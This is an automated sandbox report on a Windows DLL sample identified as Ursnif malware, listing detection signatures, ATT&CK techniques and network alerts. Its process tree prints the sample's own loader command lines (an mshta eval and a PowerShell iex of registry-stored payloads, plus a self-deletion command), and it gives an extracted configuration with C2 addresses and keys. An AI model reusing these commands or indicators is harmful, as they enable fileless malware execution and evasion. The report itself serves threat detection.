Windows
Analysis Report
nhLAwAo49f
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Windows Shell File Write to Suspicious Folder
Maps a DLL or memory area into another process
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Machine Learning detection for sample
Allocates memory in foreign processes
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Sigma detected: Suspicious Remote Thread Created
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Classification
- System is w10x64
- loaddll32.exe (PID: 6740 cmdline: loaddll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
- cmd.exe (PID: 6748 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
- rundll32.exe (PID: 6768 cmdline: rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
- control.exe (PID: 5304 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
- explorer.exe (PID: 684 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- cmd.exe (PID: 3616 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\nhLAwAo49f.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 1348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- PING.EXE (PID: 4028 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
- RuntimeBroker.exe (PID: 3808 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
- cmd.exe (PID: 6232 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\F5DD.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- rundll32.exe (PID: 6472 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
- WerFault.exe (PID: 6844 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
- WerFault.exe (PID: 7020 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 616 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
- WerFault.exe (PID: 4992 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
- mshta.exe (PID: 5520 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ftlo='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ftlo).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
- powershell.exe (PID: 6092 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- csc.exe (PID: 4572 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
- cvtres.exe (PID: 5316 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFC15.tmp" "c:\Users\user\AppData\Local\Temp\f2vxj03f\CSCE6C104441B84417C9AABF578684269B5.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- csc.exe (PID: 3108 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
- cvtres.exe (PID: 3204 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES319C.tmp" "c:\Users\user\AppData\Local\Temp\ci1gjuu1\CSCFDAADE721EC5455F89368A25D31BABAB.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- cleanup
{"RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
System Summary |
---|
Source: | Author: Florian Roth: |
Source: | Author: Nikita Nazarov, oscd.community: |
Source: | Author: Michael Haag: |
Source: | Author: Florian Roth: |
Source: | Author: Perez Diego (@darkquassar), oscd.community: |
Source: | Author: Florian Roth: |
Source: | Author: juju4, Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: frack113: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Timestamp: | 04/22/22-18:13:04.407179 04/22/22-18:13:04.407179 |
SID: | 2033203 |
Source Port: | 49773 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/22/22-18:12:43.292918 04/22/22-18:12:43.292918 |
SID: | 2033203 |
Source Port: | 49758 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/22/22-18:13:05.383399 04/22/22-18:13:05.383399 |
SID: | 2033204 |
Source Port: | 49773 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/22/22-18:13:03.616504 04/22/22-18:13:03.616504 |
SID: | 2033203 |
Source Port: | 49773 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 2_2_04893072 |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Code function: | 2_2_00B5591B |
Source: | Code function: | 2_2_00B55A14 | |
Source: | Code function: | 2_2_00B5FCC0 | |
Source: | Code function: | 2_2_00B5CE21 |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | Network Connect: | Jump to behavior |
Source: | Process created: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | ASN Name: |
Source: | IP Address: |
Source: | String found in binary or memory: | ||
Source: | Code function: | 2_2_04894CC6 |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: | ||
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | Registry key value created / modified: |
Source: | Code function: | 2_2_04893072 |
System Summary |
---|
Source: | WMI Registry write: | ||
Source: | Process created: |
Source: | Code function: | 2_2_0489821C | |
Source: | Code function: | 2_2_0489198A | |
Source: | Code function: | 2_2_0489475F | |
Source: | Code function: | 2_2_00B6C3A9 | |
Source: | Code function: | 2_2_00B70B0E | |
Source: | Code function: | 2_2_00B684D9 | |
Source: | Code function: | 2_2_00B51E50 | |
Source: | Code function: | 2_2_00B58FA6 | |
Source: | Code function: | 2_2_00B737F4 |
Source: | Code function: | 2_2_00B6488B |
Source: | Key opened: | Jump to behavior |
Source: | Section loaded: | Jump to behavior |
Source: | Static PE information: |
Source: | Code function: | 2_2_04893A9C | |
Source: | Code function: | 2_2_04894695 | |
Source: | Code function: | 2_2_048925D7 | |
Source: | Code function: | 2_2_04898441 | |
Source: | Code function: | 2_2_00B6312E | |
Source: | Code function: | 2_2_00B712F1 | |
Source: | Code function: | 2_2_00B594A5 | |
Source: | Code function: | 2_2_00B644A5 | |
Source: | Code function: | 2_2_00B65CA1 | |
Source: | Code function: | 2_2_00B51C78 | |
Source: | Code function: | 2_2_00B6AD9E | |
Source: | Code function: | 2_2_00B65D9D | |
Source: | Code function: | 2_2_00B6F5FF | |
Source: | Code function: | 2_2_00B5DDDD | |
Source: | Code function: | 2_2_00B6B628 | |
Source: | Code function: | 2_2_00B5CF88 | |
Source: | Code function: | 2_2_00B5A085 | |
Source: | Code function: | 2_2_00B65830 | |
Source: | Code function: | 2_2_00B529B2 | |
Source: | Code function: | 2_2_00B65188 | |
Source: | Code function: | 2_2_00B6C1C2 | |
Source: | Code function: | 2_2_00B57A1E | |
Source: | Code function: | 2_2_00B51B92 | |
Source: | Code function: | 2_2_00B6264B |
Source: | Binary or memory string: |
Source: | Static PE information: |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | ReversingLabs: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Key value queried: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Code function: | 2_2_04896DB6 |
Source: | Process created: |
Source: | Mutant created: | ||
Source: | File read: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Code function: | 2_2_0489B301 | |
Source: | Code function: | 2_2_0489821B | |
Source: | Code function: | 2_2_04897E29 | |
Source: | Code function: | 2_2_00B732B9 | |
Source: | Code function: | 2_2_00B62C1B | |
Source: | Code function: | 2_2_00B737F3 |
Source: | Code function: | 2_2_00B5A513 |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Malware Analysis System Evasion |
---|
Source: | Process created: | ||
Source: | Process created: |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Evasive API call chain: |
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Check user administrative privileges: |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Code function: | 2_2_00B5591B |
Source: | Binary or memory string: | ||
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 2_2_00B55A14 | |
Source: | Code function: | 2_2_00B5FCC0 | |
Source: | Code function: | 2_2_00B5CE21 |
Source: | Code function: | 2_2_00B5A513 |
Source: | Process queried: | Jump to behavior | ||
Source: | Process queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior |
Source: | Code function: | 2_2_00B5BE55 |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Thread created: | Jump to behavior | ||
Source: | Thread created: | Jump to behavior | ||
Source: | Thread created: |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Code function: | 2_2_048912D3 |
Source: | Key value queried: | Jump to behavior |
Source: | Code function: | 2_2_04895410 |
Source: | Code function: | 2_2_048912D3 |
Source: | Code function: | 2_2_00B54DF5 |
Source: | Code function: | 2_2_0489515F |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Remote Access Functionality |
---|
Source: | File source: | ||
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Obfuscated Files or Information | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact |
Default Accounts | 3 Native API | 1 Valid Accounts | 1 Valid Accounts | 1 DLL Side-Loading | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 1 Access Token Manipulation | 1 File Deletion | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | 813 Process Injection | 1 Masquerading | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Valid Accounts | LSA Secrets | 1 Query Registry | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Access Token Manipulation | Cached Domain Credentials | 11 Security Software Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 813 Process Injection | Proc Filesystem | 3 Process Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Rundll32 | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 System Owner/User Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 11 Remote System Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop | ||
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | 1 System Network Configuration Discovery | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
29% | ReversingLabs | Win32.Trojan.Lazy | ||
100% | Joe Sandbox ML |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1245293 | Download File |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
⊘No contacted domains info
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false |
| low | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
146.70.35.138 | unknown | United Kingdom | 2018 | TENET-1ZA | true |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 614013 |
Start date and time: | 2022-04-22 18:10:41 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 13m 2s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | nhLAwAo49f (renamed file extension from none to dll) |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of new started processes analysed: | 32 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 2 |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.bank.troj.evad.winDLL@31/29@0/1 |
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 52.182.143.212, 52.168.117.173, 13.107.42.16
- Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, arc.msn.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, store-images.s-microsoft.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com
- Execution Graph export aborted for target mshta.exe, PID 5520 because there are no executed functions
- Not all processes were analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- VT rate limit hit for: nhLAwAo49f.dll
Time | Type | Description |
---|---|---|
18:12:12 | API Interceptor | |
18:13:23 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
146.70.35.138 | Get hash | malicious | Browse | ||
⊘No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
TENET-1ZA | Get hash | malicious | Browse |
⊘No context
⊘No context
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_843fd29667a3a8f656751f949c19ad5cff2ee117_7cac0383_1af40bd9\Report.wer
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.841963229435912 |
Encrypted: | false |
Malicious: | false |
Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_ac76d3d55f42d8698d1e4b22618822dff34b96_7cac0383_13c853ce\Report.wer
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.8456985887519763 |
